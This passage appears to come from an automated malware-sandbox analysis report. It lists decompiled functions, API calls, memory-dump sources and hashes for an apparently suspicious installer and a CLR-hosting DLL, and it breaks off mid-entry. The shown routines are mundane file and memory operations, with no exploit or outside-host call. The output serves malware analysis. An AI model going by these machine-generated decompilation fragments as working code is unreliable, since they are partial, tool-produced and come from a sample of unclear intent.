                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 431132790-0
                                                                                                                • Opcode ID: f5072468e038d8912d27358b4c337ad2cae691a3a037a92c0f3fa67f0ee9dcd5
                                                                                                                • Instruction ID: ce95061561ce297612cf4e453f587e3fba76dde78708b67a0f2c6158557b0476
                                                                                                                • Opcode Fuzzy Hash: f5072468e038d8912d27358b4c337ad2cae691a3a037a92c0f3fa67f0ee9dcd5
                                                                                                                • Instruction Fuzzy Hash: A9011B7090022AABDF04DFA4C8549EDBF75BF04318B20461DF425676E4DB759951DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEF4B9A, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6FEF386E,00000001,00000364,FFFFFFFF,000000FF,?,8007000E,?,6FEE5559,6FEF399B), ref: 6FEF4BDB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 336be9dce480902d28008714f04dcd26b8ee778d17baa6b188dba5d8a1179d7c
                                                                                                                • Instruction ID: 0a4bc0a7633ed4b2f85c5d5d755354331dce0e4766f3d7b1bceafed67c65caf1
                                                                                                                • Opcode Fuzzy Hash: 336be9dce480902d28008714f04dcd26b8ee778d17baa6b188dba5d8a1179d7c
                                                                                                                • Instruction Fuzzy Hash: A5F0B43521762557EF115E29DE00F9A3F9CBF82774F704157AC28EA291CB20E41786E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEF3958, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,8007000E,?,?,6FED0862,8007000E,?,?,?,6FEADCAC,8007000E,?,6FED08EC,0000000C,00000004,6FEA90DC), ref: 6FEF398A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: d174e44cad1d3eff1eafa9b46ff3c52ef4aea695e199fba5ba06cc23ae7be3cd
                                                                                                                • Instruction ID: 67c63e95f910c0d764fc596d017a6382058f392c92311c9bf39ce246724a8137
                                                                                                                • Opcode Fuzzy Hash: d174e44cad1d3eff1eafa9b46ff3c52ef4aea695e199fba5ba06cc23ae7be3cd
                                                                                                                • Instruction Fuzzy Hash: 38E0A7315077115EEB111A694C05B9A7E599F423B4F3102259C28D66ECDB50D40385E3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403336, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403336(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x40c010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                0x0040333a
                                                                                                                0x0040334d
                                                                                                                0x00403355
                                                                                                                0x00000000
                                                                                                                0x0040335c
                                                                                                                0x00000000
                                                                                                                0x0040335e

                                                                                                                APIs
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA9420, Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA9431
                                                                                                                  • Part of subcall function 6FEA8FD0: _DebugHeapAllocator.LIBCPMTD ref: 6FEA8FDE
                                                                                                                  • Part of subcall function 6FEA9700: LoadLibraryW.KERNEL32(mscoree.dll,3A83C854,?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9446,00000000,6FF1F8E0), ref: 6FEA9734
                                                                                                                  • Part of subcall function 6FEA9700: GetLastError.KERNEL32(00000000,00000073,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp,?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9446,00000000), ref: 6FEA976B
                                                                                                                  • Part of subcall function 6FEA9700: GetProcAddress.KERNEL32(00000000,CorBindToRuntimeEx), ref: 6FEA9792
                                                                                                                  • Part of subcall function 6FEA9700: GetLastError.KERNEL32(?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9446), ref: 6FEA97A1
                                                                                                                  • Part of subcall function 6FEA9700: FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9446), ref: 6FEA97AE
                                                                                                                  • Part of subcall function 6FEA9700: FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6FF013E5,000000FF,?,6FEA9446), ref: 6FEA9847
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$AllocatorDebugErrorFreeHeapLast$AddressLoadProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2936703648-0
                                                                                                                • Opcode ID: 00ef7260adbbf1c31eb9912a32b14daaa630b32bbe857564a68db894be4fc625
                                                                                                                • Instruction ID: e9c95d02c71e45ad32c0f4a6e09fd1d958935e51273281addcae9b09e62321b1
                                                                                                                • Opcode Fuzzy Hash: 00ef7260adbbf1c31eb9912a32b14daaa630b32bbe857564a68db894be4fc625
                                                                                                                • Instruction Fuzzy Hash: 28E0487050510CEBCB08DF95C5A19BE7F75AF41218B30405DA41A5F384CB336F00D791
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEDA9CE, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 6FEDA9D5
                                                                                                                  • Part of subcall function 6FEDBA4E: EnterCriticalSection.KERNEL32(6FF1EA20,?,?,?,?,6FEDA9E8,00000010,00000008,6FEDB097,6FEDB0D4,6FED0A4D,6FED0C09,6FEA6BFC,6FEA89D2,?,6FEA89D2), ref: 6FEDBA7F
                                                                                                                  • Part of subcall function 6FEDBA4E: InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,6FEDA9E8,00000010,00000008,6FEDB097,6FEDB0D4,6FED0A4D,6FED0C09,6FEA6BFC,6FEA89D2,?,6FEA89D2), ref: 6FEDBA95
                                                                                                                  • Part of subcall function 6FEDBA4E: LeaveCriticalSection.KERNEL32(6FF1EA20,?,?,?,?,6FEDA9E8,00000010,00000008,6FEDB097,6FEDB0D4,6FED0A4D,6FED0C09,6FEA6BFC,6FEA89D2,?,6FEA89D2), ref: 6FEDBAA3
                                                                                                                  • Part of subcall function 6FEDBA4E: EnterCriticalSection.KERNEL32(00000000,?,?,?,6FEDA9E8,00000010,00000008,6FEDB097,6FEDB0D4,6FED0A4D,6FED0C09,6FEA6BFC,6FEA89D2,?,6FEA89D2,6FEA8A38), ref: 6FEDBAB0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 1641187343-0
                                                                                                                • Opcode ID: d4ff628cd25c63d70d2e768dd65a3aaba663f6fea4d39a7078ccf8c5c4bc1546
                                                                                                                • Instruction ID: 86afa94c1d74bc1b71c66f7140607f1eb33095047907ac02f8a1a6c5873f5564
                                                                                                                • Opcode Fuzzy Hash: d4ff628cd25c63d70d2e768dd65a3aaba663f6fea4d39a7078ccf8c5c4bc1546
                                                                                                                • Instruction Fuzzy Hash: C5E0E53494534AEFEB88AF64C8057887F60BF10729F348228F1955E6E4EBB44A929B11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004037F8, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004037F8(void* __ecx, void* __eflags) {
				void* _t2;
				void* _t5;
				void* _t6;

				_t6 = __ecx;
				E00406064(0x4e30c8);
				_t2 = E00405D51(0x4e30c8);
				if(_t2 != 0) {
					E0040674E(0x4e30c8);
					CreateDirectoryW(0x4e30c8, 0); // executed
					_t5 = E00405EAB(_t6, 0x4df0c0, 0x4e30c8); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                                                0x004037f8
                                                                                                                0x004037ff
                                                                                                                0x00403805
                                                                                                                0x0040380c
                                                                                                                0x00403811
                                                                                                                0x00403819
                                                                                                                0x00403825
                                                                                                                0x0040382b
                                                                                                                0x0040380f
                                                                                                                0x0040380f
                                                                                                                0x0040380f

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                • String ID:
                                                                                                                • API String ID: 4115351271-0
                                                                                                                • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEE144C, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?,6FEE13B0,00000000,00000000,?,?,?,6FEB14AA,00000000,00000000), ref: 6FEE1455
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 7b08889e7156fcf63c44821522d051b643e0cc1360eab0154e0067f4cce62562
                                                                                                                • Instruction ID: 07b4d4b497035c1b35b53b97b7a84c002f4202eb8d50a3a3deaba1dec5904465
                                                                                                                • Opcode Fuzzy Hash: 7b08889e7156fcf63c44821522d051b643e0cc1360eab0154e0067f4cce62562
                                                                                                                • Instruction Fuzzy Hash: A3D05B31202225575B055FE9A8006EA7F55EF035FD7514216EDB5CB3A0D375685587C0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FED1161, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 6FED1168
                                                                                                                  • Part of subcall function 6FED1523: __EH_prolog3.LIBCMT ref: 6FED152A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 431132790-0
                                                                                                                • Opcode ID: 0623a13b4e900f381d28cd84ae7301fbe4a27aae348cb233f7c360d6a0d1bc71
                                                                                                                • Instruction ID: 6b098bbba6a3a4360e6b07b258aef02a12efe853f36448ae6df8ac9610191b23
                                                                                                                • Opcode Fuzzy Hash: 0623a13b4e900f381d28cd84ae7301fbe4a27aae348cb233f7c360d6a0d1bc71
                                                                                                                • Instruction Fuzzy Hash: 4EE08C72A00249ABCB05BBA4CC11FADBE76BF9031CF34811DB1014E6E0CBB68912A746
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406C94, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00406C94(WCHAR* _a4, WCHAR* _a8) {
				int _t6;

				if(E00406328(1) == 0) {
					L2:
					_push(_a8);
					_push(_a4);
					_t6 = E00406AC5();
				} else {
					_t6 = MoveFileExW(_a4, _a8, 5); // executed
					if(_t6 == 0) {
						goto L2;
					}
				}
				 *0x47eb70 =  *0x47eb70 + 1;
				return _t6;
			}




                                                                                                                0x00406c9d
                                                                                                                0x00406caf
                                                                                                                0x00406caf
                                                                                                                0x00406cb3
                                                                                                                0x00406cb7
                                                                                                                0x00406c9f
                                                                                                                0x00406ca9
                                                                                                                0x00406cad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406cad
                                                                                                                0x00406cbe
                                                                                                                0x00406cc4

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNEL32(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                • MoveFileExW.KERNEL32(00000000,00000000,00000005,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406CA9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressFileHandleLibraryLoadModuleMoveProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2025429017-0
                                                                                                                • Opcode ID: d0e0291ba1c5e68fccd58cb3e21c6279019306ecd07a682c2fe8f024bd8e2c9e
                                                                                                                • Instruction ID: dd0cf632a7a07eea131958f651352625afa4b0b26f8695a9e27b87cafaac8404
                                                                                                                • Opcode Fuzzy Hash: d0e0291ba1c5e68fccd58cb3e21c6279019306ecd07a682c2fe8f024bd8e2c9e
                                                                                                                • Instruction Fuzzy Hash: F3D05E311083027DEB016762DD01A1B7BA5EF84359F12843FB99AA00F1EB36C4729E09
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEC2860, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: allocator
                                                                                                                • String ID:
                                                                                                                • API String ID: 3447690668-0
                                                                                                                • Opcode ID: 07d69a167b91f53bdbcffa8bf52f6d4d7c5426b5245c22211e822ba01b9027cf
                                                                                                                • Instruction ID: 2915971f44e1d86dc663381728c33defc76be191b043025a152a29962f330146
                                                                                                                • Opcode Fuzzy Hash: 07d69a167b91f53bdbcffa8bf52f6d4d7c5426b5245c22211e822ba01b9027cf
                                                                                                                • Instruction Fuzzy Hash: F1C012B55102086B8644DA58E941D5A37AD5A485187108028B51DC7350DA31F910C761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403368, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403368(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40c010, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                0x00403376
                                                                                                                0x0040337c

                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 973152223-0
                                                                                                                • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403885, Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403885() {
				void* _t1;
				void* _t3;
				signed int _t6;

				_t1 =  *0x40c010; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40c010 =  *0x40c010 | 0xffffffff;
					_t6 =  *0x40c010;
				}
				E00403CAF();
				_t3 = E00406CC7(_t6, 0x4e70d0, 7); // executed
				return _t3;
			}






                                                                                                                0x00403885
                                                                                                                0x0040388d
                                                                                                                0x00403890
                                                                                                                0x00403896
                                                                                                                0x00403896
                                                                                                                0x00403896
                                                                                                                0x0040389d
                                                                                                                0x004038a9
                                                                                                                0x004038ae

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00403AFD,?), ref: 00403890
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                • Instruction ID: 859c8e5cf93c3f84440f38a6d8c6a0cb0ce917112422b96fb642ee91708591da
                                                                                                                • Opcode Fuzzy Hash: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                • Instruction Fuzzy Hash: 1BC01231504700D7E5206FB99D4EB043A54A74037DB544B7AF4F5F11F1C77C4645852D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEDA5F5, Relevance: 1.3, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LocalAlloc.KERNEL32(00000040,8007000E,?,6FED0A63,00000164,00000004,6FF1B120,6FF1764C,?,?,80004005,6FF175EC,00000000,?,6FEA90D1), ref: 6FEDA5FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocLocal
                                                                                                                • String ID:
                                                                                                                • API String ID: 3494564517-0
                                                                                                                • Opcode ID: b264327520c7d510527d2b3d3d14dbc51ce3a84a7541e721e5a30de238b040fd
                                                                                                                • Instruction ID: feddacf92100945f8680b322c9c4eb7c7f130fdd1f61ba2d0609509499d325fa
                                                                                                                • Opcode Fuzzy Hash: b264327520c7d510527d2b3d3d14dbc51ce3a84a7541e721e5a30de238b040fd
                                                                                                                • Instruction Fuzzy Hash: ABC08C3224020CABDA001AE58805B453E2C6B00E54F104015B71848881DAA19061856A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0E95047A, Relevance: .1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
